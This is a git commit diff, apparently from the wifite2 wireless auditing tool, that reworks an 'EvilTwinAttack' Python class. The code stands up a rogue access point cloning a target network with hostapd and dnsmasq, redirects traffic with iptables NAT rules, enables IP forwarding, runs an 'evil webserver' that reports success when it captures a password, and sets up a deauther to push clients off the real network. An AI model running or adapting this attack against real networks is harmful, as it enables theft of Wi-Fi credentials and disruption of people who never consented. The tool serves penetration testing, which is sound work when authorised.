Fixing eviltwin. Lots of changes.
This commit is contained in:
derv82
@@ -4,88 +4,171 @@
|
||||
import time
|
||||
|
||||
from ..model.attack import Attack
|
||||
from ..tools.airodump import Airodump
|
||||
from ..tools.dnsmasq import Dnsmasq
|
||||
from ..tools.hostapd import Hostapd
|
||||
from ..tools.ifconfig import Ifconfig
|
||||
from ..tools.iptables import Iptables
|
||||
from ..tools.eviltwin_server import EviltwinServer
|
||||
from ..util.color import Color
|
||||
from ..util.deauther import Deauther
|
||||
from ..config import Configuration
|
||||
|
||||
class EvilTwinAttack(Attack):
|
||||
def __init__(self, target):
|
||||
'''
|
||||
Monitor-mode card should be used for deauthing (packet injection).
|
||||
Other card can be put into AP mode.
|
||||
'''
|
||||
|
||||
def __init__(self, target, deauth_iface, ap_iface):
|
||||
super(EvilTwinAttack, self).__init__(target)
|
||||
|
||||
# Args
|
||||
self.target = target
|
||||
self.deauth_iface = deauth_iface
|
||||
self.ap_iface = ap_iface
|
||||
|
||||
# State
|
||||
self.success = False
|
||||
self.completed = False
|
||||
self.crack_result = None
|
||||
self.error_msg = None
|
||||
|
||||
self.crack_result = None
|
||||
# Processes
|
||||
self.hostapd = None
|
||||
self.dnsmasq = None
|
||||
self.webserver = None
|
||||
self.deauther = None
|
||||
|
||||
self.deauther = None # Mdk3Deauther?
|
||||
|
||||
def run(self):
|
||||
#raise Exception('Eviltwin attack not implemented yet, see https://github.com/derv82/wifite2/issues/81')
|
||||
|
||||
# Start airodump on deuath iface, wait for target, etc.
|
||||
try:
|
||||
|
||||
with Airodump(channel=self.target.channel,
|
||||
target_bssid=self.target.bssid,
|
||||
skip_wps=True, # Don't check for WPS-compatibility
|
||||
output_file_prefix='airodump') as airodump:
|
||||
Color.clear_line()
|
||||
Color.p('\r{+} {O}waiting{W} for target to appear...')
|
||||
airodump_target = self.wait_for_target(airodump)
|
||||
Color.clear_entire_line()
|
||||
|
||||
self.pattack(airodump_target, 'setting up {C}%s{W}' % self.ap_iface)
|
||||
Ifconfig.up(self.ap_iface, ['10.0.0.1/24'])
|
||||
Color.clear_entire_line()
|
||||
|
||||
self.pattack(airodump_target, 'configuring {C}iptables{W}')
|
||||
self.configure_iptables(self.ap_iface)
|
||||
Color.clear_entire_line()
|
||||
|
||||
self.pattack(airodump_target, 'enabling {C}port forwarding{W}')
|
||||
self.set_port_forwarding(enabled=True)
|
||||
Color.clear_entire_line()
|
||||
|
||||
self.pattack(airodump_target, 'starting {C}hostapd{W} on {C}%s{W}' % self.ap_iface)
|
||||
self.hostapd = Hostapd(self.target, self.ap_iface)
|
||||
self.hostapd.start()
|
||||
Color.clear_entire_line()
|
||||
|
||||
self.pattack(airodump_target, 'starting {C}dnsmasq{W} on {C}%s{W}' % self.ap_iface)
|
||||
self.dnsmasq = Dnsmasq(self.ap_iface)
|
||||
self.dnsmasq.start()
|
||||
Color.clear_entire_line()
|
||||
|
||||
self.pattack(airodump_target, 'starting {C}evil webserver{W}...')
|
||||
self.webserver = EviltwinServer(self.success_callback, self.error_callback)
|
||||
self.webserver.start()
|
||||
Color.clear_entire_line()
|
||||
|
||||
self.pattack(airodump_target, 'starting {C}deauther{W}...')
|
||||
self.deauther = Deauther(self.deauth_iface, self.target)
|
||||
#self.deauther.start()
|
||||
Color.clear_entire_line()
|
||||
|
||||
while not self.completed:
|
||||
time.sleep(1)
|
||||
airodump_target = self.wait_for_target(airodump)
|
||||
|
||||
# TODO: Check hostapd, dnsmasq, and webserver statistics
|
||||
self.pattack(airodump_target, 'waiting for clients')
|
||||
|
||||
# Update deauther with latest client information
|
||||
self.deauther.update_target(airodump_target)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
# Cleanup
|
||||
Color.pl('\n{!} {O}Interrupted{W}')
|
||||
|
||||
if self.success:
|
||||
# TODO: print status & save
|
||||
self.cleanup()
|
||||
return
|
||||
|
||||
if self.error_msg:
|
||||
self.cleanup()
|
||||
raise Exception(self.error_msg)
|
||||
|
||||
self.cleanup()
|
||||
|
||||
|
||||
def pattack(self, airodump_target, status):
|
||||
Color.pattack('EvilTwin', airodump_target, 'attack', status)
|
||||
|
||||
|
||||
def success_callback(self, crack_result):
|
||||
# TODO: Stop all processes & reset IP tables
|
||||
# Called by webserver when we get a password
|
||||
self.crack_result = crack_result
|
||||
self.success = True
|
||||
self.completed = True
|
||||
|
||||
|
||||
def status_callback(self, status_message):
|
||||
# Called by webserver on status update
|
||||
pass
|
||||
|
||||
|
||||
def error_callback(self, error_msg):
|
||||
# Called by webserver on error / failure
|
||||
self.completed = True
|
||||
|
||||
|
||||
def run(self):
|
||||
# Take interface out of monitor mode
|
||||
raise Exception('Eviltwin attack not implemented yet, see https://github.com/derv82/wifite2/issues/81')
|
||||
|
||||
monitor_interface = Configuration.interface
|
||||
(_, base_interface) = Airmon.stop(monitor_interface)
|
||||
|
||||
Ifconfig.up(base_interface, ['10.0.0.1/24'])
|
||||
|
||||
self.configure_iptables(base_interface)
|
||||
|
||||
self.hostapd = Hostapd(self.target)
|
||||
self.hostapd.start(base_interface)
|
||||
|
||||
server = EviltwinServer()
|
||||
server.serve_forever()
|
||||
|
||||
try:
|
||||
while not self.completed:
|
||||
time.sleep(1)
|
||||
except KeyboardInterrupt as e:
|
||||
self.cleanup()
|
||||
raise e
|
||||
|
||||
if self.success:
|
||||
print status, save
|
||||
return
|
||||
|
||||
if self.error_msg:
|
||||
raise Exception(self.error_msg)
|
||||
self.error_msg = error_msg
|
||||
|
||||
|
||||
def cleanup(self):
|
||||
'''
|
||||
TODO:
|
||||
* Kill all processes
|
||||
* Delete config files from temp
|
||||
* Reset iptables
|
||||
* Reset interface state?
|
||||
'''
|
||||
pass
|
||||
if self.dnsmasq:
|
||||
self.dnsmasq.stop()
|
||||
|
||||
def set_port_forwrading(self, enabled=True):
|
||||
if self.hostapd:
|
||||
self.hostapd.stop()
|
||||
|
||||
if self.webserver:
|
||||
self.webserver.stop()
|
||||
# From https://stackoverflow.com/a/268686
|
||||
|
||||
if self.deauther:
|
||||
self.deauther.stop()
|
||||
|
||||
self.set_port_forwarding(enabled=False)
|
||||
|
||||
Iptables.flush() #iptables -F
|
||||
Iptables.flush(table='nat') #iptables -t nat -F
|
||||
Iptables.flush(table='mangle') #iptables -t mangle -F
|
||||
|
||||
Iptables.delete_chain() #iptables -X
|
||||
Iptables.delete_chain(table='nat') #iptables -t nat -X
|
||||
Iptables.delete_chain(table='mangle') #iptables -t mangle -X
|
||||
|
||||
|
||||
def set_port_forwarding(self, enabled=True):
|
||||
# echo "1" > /proc/sys/net/ipv4/ip_forward
|
||||
# TODO: Are there other ways to do this?
|
||||
# TODO: Are there other/better ways to do this?
|
||||
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ip_forward:
|
||||
ip_forward.write('1' if enabled else '0')
|
||||
|
||||
|
||||
def configure_iptables(self, base_interface):
|
||||
def configure_iptables(self, interface):
|
||||
# iptables -N internet -t mangle
|
||||
Iptables.new_chain('internet', 'mangle')
|
||||
|
||||
@@ -110,12 +193,10 @@ class EvilTwinAttack(Attack):
|
||||
'--to-destination', '10.0.0.1',
|
||||
])
|
||||
|
||||
self.set_port_forwarding(enabled=True)
|
||||
|
||||
#iptables -A FORWARD -i eth0 -o wlan0 -m state --state ESTABLISHED,RELATED -j ACCEPT
|
||||
Iptables.append('FORWARD', rules=[
|
||||
'--in-interface', 'eth0',
|
||||
'--out-interface', base_interface,
|
||||
'--out-interface', interface,
|
||||
'--match', 'state',
|
||||
'--state', 'ESTABLISHED,RELATED',
|
||||
'--jump', 'ACCEPT',
|
||||
@@ -130,7 +211,7 @@ class EvilTwinAttack(Attack):
|
||||
|
||||
#iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
|
||||
Iptables.append('FORWARD', rules=[
|
||||
'--in-interface', base_interface,
|
||||
'--in-interface', interface,
|
||||
'--out-interface', 'eth0',
|
||||
'--jump', 'ACCEPT',
|
||||
])
|
||||
|
||||
Reference in New Issue
Block a user